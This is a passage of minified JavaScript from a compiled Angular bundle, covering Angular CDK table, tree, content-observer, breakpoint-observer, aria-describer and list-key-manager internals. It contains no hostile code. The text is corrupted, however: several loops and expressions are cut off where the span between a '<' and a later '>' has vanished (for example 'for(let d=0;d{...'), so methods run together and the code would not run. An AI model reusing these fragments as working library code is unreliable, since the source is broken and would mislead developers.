i=this._rowOutlet.viewContainer;this._viewRepeater.applyChanges(e,i,(n,r,c)=>this._getEmbeddedViewArgs(n.item,c),n=>n.item.data,n=>{1===n.operation&&n.context&&this._renderCellTemplateForItem(n.record.item.rowDef,n.context)}),this._updateRowIndexContext(),e.forEachIdentityChange(n=>{i.get(n.currentIndex).context.$implicit=n.item.data}),this._updateNoDataRow(),this._ngZone&&qi.isInAngularZone()?this._ngZone.onStable.pipe(Cn(1),ea(this._onDestroy)).subscribe(()=>{this.updateStickyColumnStyles()}):this.updateStickyColumnStyles(),this.contentChanged.next()}addColumnDef(e){this._customColumnDefs.add(e)}removeColumnDef(e){this._customColumnDefs.delete(e)}addRowDef(e){this._customRowDefs.add(e)}removeRowDef(e){this._customRowDefs.delete(e)}addHeaderRowDef(e){this._customHeaderRowDefs.add(e),this._headerRowDefChanged=!0}removeHeaderRowDef(e){this._customHeaderRowDefs.delete(e),this._headerRowDefChanged=!0}addFooterRowDef(e){this._customFooterRowDefs.add(e),this._footerRowDefChanged=!0}removeFooterRowDef(e){this._customFooterRowDefs.delete(e),this._footerRowDefChanged=!0}setNoDataRow(e){this._customNoDataRow=e}updateStickyHeaderRowStyles(){const e=this._getRenderedRows(this._headerRowOutlet),n=this._elementRef.nativeElement.querySelector("thead");n&&(n.style.display=e.length?"":"none");const r=this._headerRowDefs.map(c=>c.sticky);this._stickyStyler.clearStickyPositioning(e,["top"]),this._stickyStyler.stickRows(e,r,"top"),this._headerRowDefs.forEach(c=>c.resetStickyChanged())}updateStickyFooterRowStyles(){const e=this._getRenderedRows(this._footerRowOutlet),n=this._elementRef.nativeElement.querySelector("tfoot");n&&(n.style.display=e.length?"":"none");const r=this._footerRowDefs.map(c=>c.sticky);this._stickyStyler.clearStickyPositioning(e,["bottom"]),this._stickyStyler.stickRows(e,r,"bottom"),this._stickyStyler.updateStickyFooterContainer(this._elementRef.nativeElement,r),this._footerRowDefs.forEach(c=>c.resetStickyChanged())}updateStickyColumnStyles(){const e=this._getRenderedRows(this._headerRowOutlet),i=this._getRenderedRows(this._rowOutlet),n=this._getRenderedRows(this._footerRowOutlet);(this._isNativeHtmlTable&&!this._fixedLayout||this._stickyColumnStylesNeedReset)&&(this._stickyStyler.clearStickyPositioning([...e,...i,...n],["left","right"]),this._stickyColumnStylesNeedReset=!1),e.forEach((r,c)=>{this._addStickyColumnStyles([r],this._headerRowDefs[c])}),this._rowDefs.forEach(r=>{const c=[];for(let d=0;d{this._addStickyColumnStyles([r],this._footerRowDefs[c])}),Array.from(this._columnDefsByName.values()).forEach(r=>r.resetStickyChanged())}_getAllRenderRows(){const e=[],i=this._cachedRenderRowsMap;this._cachedRenderRowsMap=new Map;for(let n=0;n{const d=n&&n.has(c)?n.get(c):[];if(d.length){const T=d.shift();return T.dataIndex=i,T}return{data:e,rowDef:c,dataIndex:i}})}_cacheColumnDefs(){this._columnDefsByName.clear(),R3(this._getOwnDefs(this._contentColumnDefs),this._customColumnDefs).forEach(i=>{this._columnDefsByName.has(i.name),this._columnDefsByName.set(i.name,i)})}_cacheRowDefs(){this._headerRowDefs=R3(this._getOwnDefs(this._contentHeaderRowDefs),this._customHeaderRowDefs),this._footerRowDefs=R3(this._getOwnDefs(this._contentFooterRowDefs),this._customFooterRowDefs),this._rowDefs=R3(this._getOwnDefs(this._contentRowDefs),this._customRowDefs);const e=this._rowDefs.filter(i=>!i.when);this._defaultRowDef=e[0]}_renderUpdatedColumns(){const e=(c,d)=>c||!!d.getColumnsDiff(),i=this._rowDefs.reduce(e,!1);i&&this._forceRenderDataRows();const n=this._headerRowDefs.reduce(e,!1);n&&this._forceRenderHeaderRows();const r=this._footerRowDefs.reduce(e,!1);return r&&this._forceRenderFooterRows(),i||n||r}_switchDataSource(e){this._data=[],f3(this.dataSource)&&this.dataSource.disconnect(this),this._renderChangeSubscription&&(this._renderChangeSubscription.unsubscribe(),this._renderChangeSubscription=null),e||(this._dataDiffer&&this._dataDiffer.diff([]),this._rowOutlet.viewContainer.clear()),this._dataSource=e}_observeRenderChanges(){if(!this.dataSource)return;let e;f3(this.dataSource)?e=this.dataSource.connect(this):Cm(this.dataSource)?e=this.dataSource:Array.isArray(this.dataSource)&&(e=Bi(this.dataSource)),this._renderChangeSubscription=e.pipe(ea(this._onDestroy)).subscribe(i=>{this._data=i||[],this.renderRows()})}_forceRenderHeaderRows(){this._headerRowOutlet.viewContainer.length>0&&this._headerRowOutlet.viewContainer.clear(),this._headerRowDefs.forEach((e,i)=>this._renderRow(this._headerRowOutlet,e,i)),this.updateStickyHeaderRowStyles()}_forceRenderFooterRows(){this._footerRowOutlet.viewContainer.length>0&&this._footerRowOutlet.viewContainer.clear(),this._footerRowDefs.forEach((e,i)=>this._renderRow(this._footerRowOutlet,e,i)),this.updateStickyFooterRowStyles()}_addStickyColumnStyles(e,i){const n=Array.from(i.columns||[]).map(d=>this._columnDefsByName.get(d)),r=n.map(d=>d.sticky),c=n.map(d=>d.stickyEnd);this._stickyStyler.updateStickyColumns(e,r,c,!this._fixedLayout||this._forceRecalculateCellWidths)}_getRenderedRows(e){const i=[];for(let n=0;n!r.when||r.when(i,e));else{let r=this._rowDefs.find(c=>c.when&&c.when(i,e))||this._defaultRowDef;r&&n.push(r)}return n}_getEmbeddedViewArgs(e,i){return{templateRef:e.rowDef.template,context:{$implicit:e.data},index:i}}_renderRow(e,i,n,r={}){const c=e.viewContainer.createEmbeddedView(i.template,r,n);return this._renderCellTemplateForItem(i,r),c}_renderCellTemplateForItem(e,i){for(let n of this._getCellTemplates(e))Lh.mostRecentCellOutlet&&Lh.mostRecentCellOutlet._viewContainer.createEmbeddedView(n,i);this._changeDetectorRef.markForCheck()}_updateRowIndexContext(){const e=this._rowOutlet.viewContainer;for(let i=0,n=e.length;i{const n=this._columnDefsByName.get(i);return e.extractCellTemplate(n)}):[]}_applyNativeTableSections(){const e=this._document.createDocumentFragment(),i=[{tag:"thead",outlets:[this._headerRowOutlet]},{tag:"tbody",outlets:[this._rowOutlet,this._noDataRowOutlet]},{tag:"tfoot",outlets:[this._footerRowOutlet]}];for(const n of i){const r=this._document.createElement(n.tag);r.setAttribute("role","rowgroup");for(const c of n.outlets)r.appendChild(c.elementRef.nativeElement);e.appendChild(r)}this._elementRef.nativeElement.appendChild(e)}_forceRenderDataRows(){this._dataDiffer.diff([]),this._rowOutlet.viewContainer.clear(),this.renderRows()}_checkStickyStates(){const e=(i,n)=>i||n.hasStickyChanged();this._headerRowDefs.reduce(e,!1)&&this.updateStickyHeaderRowStyles(),this._footerRowDefs.reduce(e,!1)&&this.updateStickyFooterRowStyles(),Array.from(this._columnDefsByName.values()).reduce(e,!1)&&(this._stickyColumnStylesNeedReset=!0,this.updateStickyColumnStyles())}_setupStickyStyler(){this._stickyStyler=new yfe(this._isNativeHtmlTable,this.stickyCssClass,this._dir?this._dir.value:"ltr",this._coalescedStyleScheduler,this._platform.isBrowser,this.needsPositionStickyOnElement,this._stickyPositioningListener),(this._dir?this._dir.change:Bi()).pipe(ea(this._onDestroy)).subscribe(i=>{this._stickyStyler.direction=i,this.updateStickyColumnStyles()})}_getOwnDefs(e){return e.filter(i=>!i._table||i._table===this)}_updateNoDataRow(){const e=this._customNoDataRow||this._noDataRow;if(!e)return;const i=0===this._rowOutlet.viewContainer.length;if(i===this._isShowingNoDataRow)return;const n=this._noDataRowOutlet.viewContainer;if(i){const r=n.createEmbeddedView(e.templateRef),c=r.rootNodes[0];1===r.rootNodes.length&&(null==c?void 0:c.nodeType)===this._document.ELEMENT_NODE&&(c.setAttribute("role","row"),c.classList.add(e._contentClassName))}else n.clear();this._isShowingNoDataRow=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(yd),Ee(Ma),Ee(mi),Vr("role"),Ee(Cr,8),Ee(ga),Ee(cr),Ee(Ny),Ee(gw),Ee(bm),Ee(vw,12),Ee(qi,8))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-table"],["table","cdk-table",""]],contentQueries:function(e,i,n){if(1&e&&(fa(n,T3,5),fa(n,Nh,5),fa(n,A3,5),fa(n,Uy,5),fa(n,qy,5)),2&e){let r;Vt(r=Bt())&&(i._noDataRow=r.first),Vt(r=Bt())&&(i._contentColumnDefs=r),Vt(r=Bt())&&(i._contentRowDefs=r),Vt(r=Bt())&&(i._contentHeaderRowDefs=r),Vt(r=Bt())&&(i._contentFooterRowDefs=r)}},viewQuery:function(e,i){if(1&e&&(Mi(E3,7),Mi(D3,7),Mi(x3,7),Mi(w3,7)),2&e){let n;Vt(n=Bt())&&(i._rowOutlet=n.first),Vt(n=Bt())&&(i._headerRowOutlet=n.first),Vt(n=Bt())&&(i._footerRowOutlet=n.first),Vt(n=Bt())&&(i._noDataRowOutlet=n.first)}},hostAttrs:[1,"cdk-table"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("cdk-table-fixed-layout",i.fixedLayout)},inputs:{trackBy:"trackBy",dataSource:"dataSource",multiTemplateDataRows:"multiTemplateDataRows",fixedLayout:"fixedLayout"},outputs:{contentChanged:"contentChanged"},exportAs:["cdkTable"],features:[ki([{provide:k1,useExisting:t},{provide:Ny,useClass:gz},{provide:gw,useClass:xz},{provide:vw,useValue:null}])],ngContentSelectors:lfe,decls:6,vars:0,consts:[["headerRowOutlet",""],["rowOutlet",""],["noDataRowOutlet",""],["footerRowOutlet",""]],template:function(e,i){1&e&&(Jn(cfe),va(0),va(1,1),Ir(2,0)(3,1)(4,2)(5,3))},dependencies:[E3,D3,x3,w3],styles:[".cdk-table-fixed-layout{table-layout:fixed}"],encapsulation:2}),t})();function R3(t,a){return t.concat(Array.from(a))}let Aw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Hy]}),t})();class Rz extends class Mfe{constructor(){this.expansionModel=new I1(!0)}toggle(a){this.expansionModel.toggle(this._trackByValue(a))}expand(a){this.expansionModel.select(this._trackByValue(a))}collapse(a){this.expansionModel.deselect(this._trackByValue(a))}isExpanded(a){return this.expansionModel.isSelected(this._trackByValue(a))}toggleDescendants(a){this.expansionModel.isSelected(this._trackByValue(a))?this.collapseDescendants(a):this.expandDescendants(a)}collapseAll(){this.expansionModel.clear()}expandDescendants(a){let e=[a];e.push(...this.getDescendants(a)),this.expansionModel.select(...e.map(i=>this._trackByValue(i)))}collapseDescendants(a){let e=[a];e.push(...this.getDescendants(a)),this.expansionModel.deselect(...e.map(i=>this._trackByValue(i)))}_trackByValue(a){return this.trackBy?this.trackBy(a):a}}{constructor(a,e){super(),this.getChildren=a,this.options=e,this.options&&(this.trackBy=this.options.trackBy)}expandAll(){this.expansionModel.clear();const a=this.dataNodes.reduce((e,i)=>[...e,...this.getDescendants(i),i],[]);this.expansionModel.select(...a.map(e=>this._trackByValue(e)))}getDescendants(a){const e=[];return this._getDescendants(e,a),e.splice(1)}_getDescendants(a,e){a.push(e);const i=this.getChildren(e);Array.isArray(i)?i.forEach(n=>this._getDescendants(a,n)):Cm(i)&&i.pipe(Cn(1),Dn(Boolean)).subscribe(n=>{for(const r of n)this._getDescendants(a,r)})}}const S3=new ni("CDK_TREE_NODE_OUTLET_NODE");let Gy=(()=>{class t{constructor(e,i){this.viewContainer=e,this._node=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo),Ee(S3,8))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeOutlet",""]]}),t})();class vfe{constructor(a){this.$implicit=a}}let k3=(()=>{class t{constructor(e){this.template=e}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeDef",""]],inputs:{when:["cdkTreeNodeDefWhen","when"]}}),t})(),zh=(()=>{class t{constructor(e,i){this._differs=e,this._changeDetectorRef=i,this._onDestroy=new J,this._levels=new Map,this.viewChange=new zs({start:0,end:Number.MAX_VALUE})}get dataSource(){return this._dataSource}set dataSource(e){this._dataSource!==e&&this._switchDataSource(e)}ngOnInit(){this._dataDiffer=this._differs.find([]).create(this.trackBy)}ngOnDestroy(){this._nodeOutlet.viewContainer.clear(),this.viewChange.complete(),this._onDestroy.next(),this._onDestroy.complete(),this._dataSource&&"function"==typeof this._dataSource.disconnect&&this.dataSource.disconnect(this),this._dataSubscription&&(this._dataSubscription.unsubscribe(),this._dataSubscription=null)}ngAfterContentChecked(){const e=this._nodeDefs.filter(i=>!i.when);this._defaultNodeDef=e[0],this.dataSource&&this._nodeDefs&&!this._dataSubscription&&this._observeRenderChanges()}_switchDataSource(e){this._dataSource&&"function"==typeof this._dataSource.disconnect&&this.dataSource.disconnect(this),this._dataSubscription&&(this._dataSubscription.unsubscribe(),this._dataSubscription=null),e||this._nodeOutlet.viewContainer.clear(),this._dataSource=e,this._nodeDefs&&this._observeRenderChanges()}_observeRenderChanges(){let e;f3(this._dataSource)?e=this._dataSource.connect(this):Cm(this._dataSource)?e=this._dataSource:Array.isArray(this._dataSource)&&(e=Bi(this._dataSource)),e&&(this._dataSubscription=e.pipe(ea(this._onDestroy)).subscribe(i=>this.renderNodeChanges(i)))}renderNodeChanges(e,i=this._dataDiffer,n=this._nodeOutlet.viewContainer,r){const c=i.diff(e);!c||(c.forEachOperation((d,T,k)=>{if(null==d.previousIndex)this.insertNode(e[k],k,n,r);else if(null==k)n.remove(T),this._levels.delete(d.item);else{const q=n.get(T);n.move(q,k)}}),this._changeDetectorRef.detectChanges())}_getNodeDef(e,i){return 1===this._nodeDefs.length?this._nodeDefs.first:this._nodeDefs.find(r=>r.when&&r.when(i,e))||this._defaultNodeDef}insertNode(e,i,n,r){const c=this._getNodeDef(e,i),d=new vfe(e);d.level=this.treeControl.getLevel?this.treeControl.getLevel(e):void 0!==r&&this._levels.has(r)?this._levels.get(r)+1:0,this._levels.set(e,d.level),(n||this._nodeOutlet.viewContainer).createEmbeddedView(c.template,d,i),hu.mostRecentTreeNode&&(hu.mostRecentTreeNode.data=e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(yd),Ee(Ma))},t.\u0275cmp=Wt({type:t,selectors:[["cdk-tree"]],contentQueries:function(e,i,n){if(1&e&&fa(n,k3,5),2&e){let r;Vt(r=Bt())&&(i._nodeDefs=r)}},viewQuery:function(e,i){if(1&e&&Mi(Gy,7),2&e){let n;Vt(n=Bt())&&(i._nodeOutlet=n.first)}},hostAttrs:["role","tree",1,"cdk-tree"],inputs:{dataSource:"dataSource",treeControl:"treeControl",trackBy:"trackBy"},exportAs:["cdkTree"],decls:1,vars:0,consts:[["cdkTreeNodeOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Gy],encapsulation:2}),t})(),hu=(()=>{class t{constructor(e,i){this._elementRef=e,this._tree=i,this._destroyed=new J,this._dataChanges=new J,t.mostRecentTreeNode=this,this.role="treeitem"}get role(){return"treeitem"}set role(e){this._elementRef.nativeElement.setAttribute("role",e)}get data(){return this._data}set data(e){e!==this._data&&(this._data=e,this._setRoleFromData(),this._dataChanges.next())}get isExpanded(){return this._tree.treeControl.isExpanded(this._data)}get level(){return this._tree.treeControl.getLevel?this._tree.treeControl.getLevel(this._data):this._parentNodeAriaLevel}ngOnInit(){this._parentNodeAriaLevel=function Afe(t){let a=t.parentElement;for(;a&&!Tfe(a);)a=a.parentElement;return a?a.classList.contains("cdk-nested-tree-node")?Uo(a.getAttribute("aria-level")):0:-1}(this._elementRef.nativeElement),this._elementRef.nativeElement.setAttribute("aria-level",`${this.level+1}`)}ngOnDestroy(){t.mostRecentTreeNode===this&&(t.mostRecentTreeNode=null),this._dataChanges.complete(),this._destroyed.next(),this._destroyed.complete()}focus(){this._elementRef.nativeElement.focus()}_setRoleFromData(){this.role="treeitem"}}return t.mostRecentTreeNode=null,t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh))},t.\u0275dir=Ot({type:t,selectors:[["cdk-tree-node"]],hostAttrs:[1,"cdk-tree-node"],hostVars:1,hostBindings:function(e,i){2&e&&Rt("aria-expanded",i.isExpanded)},inputs:{role:"role"},exportAs:["cdkTreeNode"]}),t})();function Tfe(t){const a=t.classList;return!(!(null==a?void 0:a.contains("cdk-nested-tree-node"))&&!(null==a?void 0:a.contains("cdk-tree")))}let Tw=(()=>{class t extends hu{constructor(e,i,n){super(e,i),this._differs=n}ngAfterContentInit(){this._dataDiffer=this._differs.find([]).create(this._tree.trackBy);const e=this._tree.treeControl.getChildren(this.data);Array.isArray(e)?this.updateChildrenNodes(e):Cm(e)&&e.pipe(ea(this._destroyed)).subscribe(i=>this.updateChildrenNodes(i)),this.nodeOutlet.changes.pipe(ea(this._destroyed)).subscribe(()=>this.updateChildrenNodes())}ngOnInit(){super.ngOnInit()}ngOnDestroy(){this._clear(),super.ngOnDestroy()}updateChildrenNodes(e){const i=this._getNodeOutlet();e&&(this._children=e),i&&this._children?this._tree.renderNodeChanges(this._children,this._dataDiffer,i.viewContainer,this._data):this._dataDiffer.diff([])}_clear(){const e=this._getNodeOutlet();e&&(e.viewContainer.clear(),this._dataDiffer.diff([]))}_getNodeOutlet(){const e=this.nodeOutlet;return e&&e.find(i=>!i._node||i._node===this)}}return t.\u0275fac=function(e){return new(e||t)(Ee(mi),Ee(zh),Ee(yd))},t.\u0275dir=Ot({type:t,selectors:[["cdk-nested-tree-node"]],contentQueries:function(e,i,n){if(1&e&&fa(n,Gy,5),2&e){let r;Vt(r=Bt())&&(i.nodeOutlet=r)}},hostAttrs:[1,"cdk-nested-tree-node"],inputs:{role:"role",disabled:"disabled",tabIndex:"tabIndex"},exportAs:["cdkNestedTreeNode"],features:[ki([{provide:hu,useExisting:t},{provide:S3,useExisting:t}]),ci]}),t})(),Dw=(()=>{class t{constructor(e,i){this._tree=e,this._treeNode=i,this._recursive=!1}get recursive(){return this._recursive}set recursive(e){this._recursive=wi(e)}_toggle(e){this.recursive?this._tree.treeControl.toggleDescendants(this._treeNode.data):this._tree.treeControl.toggle(this._treeNode.data),e.stopPropagation()}}return t.\u0275fac=function(e){return new(e||t)(Ee(zh),Ee(hu))},t.\u0275dir=Ot({type:t,selectors:[["","cdkTreeNodeToggle",""]],hostBindings:function(e,i){1&e&&he("click",function(r){return i._toggle(r)})},inputs:{recursive:["cdkTreeNodeToggleRecursive","recursive"]}}),t})(),xw=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function es(t,...a){return a.length?a.some(e=>t[e]):t.altKey||t.shiftKey||t.ctrlKey||t.metaKey}function lp(t,a=Vy){return Ie((e,i)=>{let n=null,r=null,c=null;const d=()=>{if(n){n.unsubscribe(),n=null;const k=r;r=null,i.next(k)}};function T(){const k=c+t,q=a.now();if(q{r=k,c=a.now(),n||(n=a.schedule(T,t),i.add(n))},()=>{d(),i.complete()},void 0,()=>{r=n=null}))})}function Sw(t){return Dn((a,e)=>t<=e)}function Bh(t,a=v){return t=null!=t?t:Wfe,Ie((e,i)=>{let n,r=!0;e.subscribe(Ae(i,c=>{const d=a(c);(r||!t(n,d))&&(r=!1,n=d,i.next(c))}))})}function Wfe(t,a){return t===a}let Pz=(()=>{class t{create(e){return"undefined"==typeof MutationObserver?null:new MutationObserver(e)}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Ffe=(()=>{class t{constructor(e){this._mutationObserverFactory=e,this._observedElements=new Map}ngOnDestroy(){this._observedElements.forEach((e,i)=>this._cleanupObserver(i))}observe(e){const i=Gr(e);return new G(n=>{const c=this._observeElement(i).subscribe(n);return()=>{c.unsubscribe(),this._unobserveElement(i)}})}_observeElement(e){if(this._observedElements.has(e))this._observedElements.get(e).count++;else{const i=new J,n=this._mutationObserverFactory.create(r=>i.next(r));n&&n.observe(e,{characterData:!0,childList:!0,subtree:!0}),this._observedElements.set(e,{observer:n,stream:i,count:1})}return this._observedElements.get(e).stream}_unobserveElement(e){this._observedElements.has(e)&&(this._observedElements.get(e).count--,this._observedElements.get(e).count||this._cleanupObserver(e))}_cleanupObserver(e){if(this._observedElements.has(e)){const{observer:i,stream:n}=this._observedElements.get(e);i&&i.disconnect(),n.complete(),this._observedElements.delete(e)}}}return t.\u0275fac=function(e){return new(e||t)(At(Pz))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),P3=(()=>{class t{constructor(e,i,n){this._contentObserver=e,this._elementRef=i,this._ngZone=n,this.event=new Tt,this._disabled=!1,this._currentSubscription=null}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e),this._disabled?this._unsubscribe():this._subscribe()}get debounce(){return this._debounce}set debounce(e){this._debounce=Uo(e),this._subscribe()}ngAfterContentInit(){!this._currentSubscription&&!this.disabled&&this._subscribe()}ngOnDestroy(){this._unsubscribe()}_subscribe(){this._unsubscribe();const e=this._contentObserver.observe(this._elementRef);this._ngZone.runOutsideAngular(()=>{this._currentSubscription=(this.debounce?e.pipe(lp(this.debounce)):e).subscribe(this.event)})}_unsubscribe(){var e;null===(e=this._currentSubscription)||void 0===e||e.unsubscribe()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ffe),Ee(mi),Ee(qi))},t.\u0275dir=Ot({type:t,selectors:[["","cdkObserveContent",""]],inputs:{disabled:["cdkObserveContentDisabled","disabled"],debounce:"debounce"},outputs:{event:"cdkObserveContent"},exportAs:["cdkObserveContent"]}),t})(),$y=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[Pz]}),t})();const Oz=new Set;let N1,Vfe=(()=>{class t{constructor(e){this._platform=e,this._matchMedia=this._platform.isBrowser&&window.matchMedia?window.matchMedia.bind(window):Hfe}matchMedia(e){return(this._platform.WEBKIT||this._platform.BLINK)&&function Bfe(t){if(!Oz.has(t))try{N1||(N1=document.createElement("style"),N1.setAttribute("type","text/css"),document.head.appendChild(N1)),N1.sheet&&(N1.sheet.insertRule(`@media ${t} {body{ }}`,0),Oz.add(t))}catch(a){console.error(a)}}(e),this._matchMedia(e)}}return t.\u0275fac=function(e){return new(e||t)(At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Hfe(t){return{matches:"all"===t||""===t,media:t,addListener:()=>{},removeListener:()=>{}}}let O3=(()=>{class t{constructor(e,i){this._mediaMatcher=e,this._zone=i,this._queries=new Map,this._destroySubject=new J}ngOnDestroy(){this._destroySubject.next(),this._destroySubject.complete()}isMatched(e){return Nz(Oy(e)).some(n=>this._registerQuery(n).mql.matches)}observe(e){let r=mg(Nz(Oy(e)).map(c=>this._registerQuery(c).observable));return r=ug(r.pipe(Cn(1)),r.pipe(Sw(1),lp(0))),r.pipe(Xe(c=>{const d={matches:!1,breakpoints:{}};return c.forEach(({matches:T,query:k})=>{d.matches=d.matches||T,d.breakpoints[k]=T}),d}))}_registerQuery(e){if(this._queries.has(e))return this._queries.get(e);const i=this._mediaMatcher.matchMedia(e),r={observable:new G(c=>{const d=T=>this._zone.run(()=>c.next(T));return i.addListener(d),()=>{i.removeListener(d)}}).pipe(Ro(i),Xe(({matches:c})=>({query:e,matches:c})),ea(this._destroySubject)),mql:i};return this._queries.set(e,r),r}}return t.\u0275fac=function(e){return new(e||t)(At(Vfe),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Nz(t){return t.map(a=>a.split(",")).reduce((a,e)=>a.concat(e)).map(a=>a.trim())}function N3(t,a){return(t.getAttribute(a)||"").match(/\S+/g)||[]}const Wz="cdk-describedby-message",L3="cdk-describedby-host";let kw=0,Pw=(()=>{class t{constructor(e,i){this._platform=i,this._messageRegistry=new Map,this._messagesContainer=null,this._id=""+kw++,this._document=e,this._id=Po(h1)+"-"+kw++}describe(e,i,n){if(!this._canBeDescribed(e,i))return;const r=Ow(i,n);"string"!=typeof i?(Fz(i,this._id),this._messageRegistry.set(r,{messageElement:i,referenceCount:0})):this._messageRegistry.has(r)||this._createMessageElement(i,n),this._isElementDescribedByMessage(e,r)||this._addMessageReference(e,r)}removeDescription(e,i,n){var r;if(!i||!this._isElementNode(e))return;const c=Ow(i,n);if(this._isElementDescribedByMessage(e,c)&&this._removeMessageReference(e,c),"string"==typeof i){const d=this._messageRegistry.get(c);d&&0===d.referenceCount&&this._deleteMessageElement(c)}0===(null===(r=this._messagesContainer)||void 0===r?void 0:r.childNodes.length)&&(this._messagesContainer.remove(),this._messagesContainer=null)}ngOnDestroy(){var e;const i=this._document.querySelectorAll(`[${L3}="${this._id}"]`);for(let n=0;n0!=n.indexOf(Wz));e.setAttribute("aria-describedby",i.join(" "))}_addMessageReference(e,i){const n=this._messageRegistry.get(i);(function Ufe(t,a,e){const i=N3(t,a);i.some(n=>n.trim()==e.trim())||(i.push(e.trim()),t.setAttribute(a,i.join(" ")))})(e,"aria-describedby",n.messageElement.id),e.setAttribute(L3,this._id),n.referenceCount++}_removeMessageReference(e,i){const n=this._messageRegistry.get(i);n.referenceCount--,function qfe(t,a,e){const n=N3(t,a).filter(r=>r!=e.trim());n.length?t.setAttribute(a,n.join(" ")):t.removeAttribute(a)}(e,"aria-describedby",n.messageElement.id),e.removeAttribute(L3)}_isElementDescribedByMessage(e,i){const n=N3(e,"aria-describedby"),r=this._messageRegistry.get(i),c=r&&r.messageElement.id;return!!c&&-1!=n.indexOf(c)}_canBeDescribed(e,i){if(!this._isElementNode(e))return!1;if(i&&"object"==typeof i)return!0;const n=null==i?"":`${i}`.trim(),r=e.getAttribute("aria-label");return!(!n||r&&r.trim()===n)}_isElementNode(e){return e.nodeType===this._document.ELEMENT_NODE}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(cr))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();function Ow(t,a){return"string"==typeof t?`${a||""}/${t}`:t}function Fz(t,a){t.id||(t.id=`${Wz}-${a}-${kw++}`)}class Vz{constructor(a){this._items=a,this._activeItemIndex=-1,this._activeItem=null,this._wrap=!1,this._letterKeyStream=new J,this._typeaheadSubscription=I.EMPTY,this._vertical=!0,this._allowedModifierKeys=[],this._homeAndEnd=!1,this._skipPredicateFn=e=>e.disabled,this._pressedLetters=[],this.tabOut=new J,this.change=new J,a instanceof Cd&&a.changes.subscribe(e=>{if(this._activeItem){const n=e.toArray().indexOf(this._activeItem);n>-1&&n!==this._activeItemIndex&&(this._activeItemIndex=n)}})}skipPredicate(a){return this._skipPredicateFn=a,this}withWrap(a=!0){return this._wrap=a,this}withVerticalOrientation(a=!0){return this._vertical=a,this}withHorizontalOrientation(a){return this._horizontal=a,this}withAllowedModifierKeys(a){return this._allowedModifierKeys=a,this}withTypeAhead(a=200){return this._typeaheadSubscription.unsubscribe(),this._typeaheadSubscription=this._letterKeyStream.pipe(qr(e=>this._pressedLetters.push(e)),lp(a),Dn(()=>this._pressedLetters.length>0),Xe(()=>this._pressedLetters.join(""))).subscribe(e=>{const i=this._getItemsArray();for(let n=1;n!a[r]||this._allowedModifierKeys.indexOf(r)>-1);switch(e){case 9:return void this.tabOut.next();case 40:if(this._vertical&&n){this.setNextItemActive();break}return;case 38:if(this._vertical&&n){this.setPreviousItemActive();break}return;case 39:if(this._horizontal&&n){"rtl"===this._horizontal?this.setPreviousItemActive():this.setNextItemActive();break}return;case 37:if(this._horizontal&&n){"rtl"===this._horizontal?this.setNextItemActive():this.setPreviousItemActive();break}return;case 36:if(this._homeAndEnd&&n){this.setFirstItemActive();break}return;case 35:if(this._homeAndEnd&&n){this.setLastItemActive();break}return;default:return void((n||es(a,"shiftKey"))&&(a.key&&1===a.key.length?this._letterKeyStream.next(a.key.toLocaleUpperCase()):(e>=65&&e<=90||e>=48&&e<=57)&&this._letterKeyStream.next(String.fromCharCode(e))))}this._pressedLetters=[],a.preventDefault()}get activeItemIndex(){return this._activeItemIndex}get activeItem(){return this._activeItem}isTyping(){return this._pressedLetters.length>0}setFirstItemActive(){this._setActiveItemByIndex(0,1)}setLastItemActive(){this._setActiveItemByIndex(this._items.length-1,-1)}setNextItemActive(){this._activeItemIndex<0?this.setFirstItemActive():this._setActiveItemByDelta(1)}setPreviousItemActive(){this._activeItemIndex<0&&this._wrap?this.setLastItemActive():this._setActiveItemByDelta(-1)}updateActiveItem(a){const e=this._getItemsArray(),i="number"==typeof a?a:e.indexOf(a),n=e[i];this._activeItem=null==n?null:n,this._activeItemIndex=i}_setActiveItemByDelta(a){this._wrap?this._setActiveInWrapMode(a):this._setActiveInDefaultMode(a)}_setActiveInWrapMode(a){const e=this._getItemsArray();for(let i=1;i<=e.length;i++){const n=(this._activeItemIndex+a*i+e.length)%e.length;if(!this._skipPredicateFn(e[n]))return void this.setActiveItem(n)}}_setActiveInDefaultMode(a){this._setActiveItemByIndex(this._activeItemIndex+a,a)}_setActiveItemByIndex(a,e){const i=this._getItemsArray();if(i[a]){for(;this._skipPredicateFn(i[a]);)if(!i[a+=e])return;this.setActiveItem(a)}}_getItemsArray(){return this._items instanceof Cd?this._items.toArray():this._items}}class Bz extends Vz{setActiveItem(a){this.activeItem&&this.activeItem.setInactiveStyles(),super.setActiveItem(a),this.activeItem&&this.activeItem.setActiveStyles()}}class L1 extends Vz{constructor(){super(...arguments),this._origin="program"}setFocusOrigin(a){return this._origin=a,this}setActiveItem(a){super.setActiveItem(a),this.activeItem&&this.activeItem.focus(this._origin)}}let Ky=(()=>{class t{constructor(e){this._platform=e}isDisabled(e){return e.hasAttribute("disabled")}isVisible(e){return function jfe(t){return!!(t.offsetWidth||t.offsetHeight||"function"==typeof 